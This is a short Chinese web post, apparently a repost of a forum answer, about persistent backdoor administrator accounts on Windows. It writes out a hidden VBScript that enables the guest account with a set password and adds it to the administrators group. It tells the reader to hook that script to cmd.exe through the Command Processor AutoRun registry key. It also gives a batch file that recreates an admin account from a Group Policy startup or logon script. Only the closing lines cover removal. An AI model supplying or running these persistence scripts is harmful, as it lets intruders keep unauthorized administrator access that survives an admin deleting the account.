set wsh=createobject("wscript.shell")
wsh.run "net user guest /active:yes",0 (激活guest账号)
wsh.run "net user guest djhacker",0 (修改guest密码为djhacker)
wsh.run "net localgroup administrators guest /add",0 (添加guest到管理组)
然后打开注册表修改注册标里面的:
hkey_local_machine\software\microsoft\command processor\autorun
在键值里面加入你vbs文件的路径就ok,然后运行vbs文件
如果管理员把你动过手脚的guest账号停了,当时他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那vbs文件.
他是用这种方式添加的不死账户,你可以根据这个思路反回去。他在系统目录下的一个不起眼的目录下 建立一个bat格式文件(为了不被发现 所以找个不起眼的地方)
内容为net user xiaohun 123 /add
net localgroup Administrators xiaohun /add
xiaohun是他要设置的帐号 123是帐号的密码,
然后他去点开始>>运行>>gpedit.msc>>Windows设置>>脚本(启动/关机)>>启动
然后点添加 找到刚才在系统目录下做的bat文件, 然后点应用.
这样一来 只要管理员删掉了他的帐号 你重启之后 又会自动建立帐号,
所以你要去开始》运行》gpedit.msc》Windows设置》脚本(启动关机),然后给他干掉
当然他也有可能还去gpedit.msc>>用户配置>>Windows设置>>脚本(登陆/注销) 这里设置 这样一来 如果你注销他 就等于给他重建了个账号
至于你说的进程,你大可以有手杀或者软件就可以搞定的。
欢迎分享,转载请注明来源:夏雨云
微信扫一扫
支付宝扫一扫
评论列表(0条)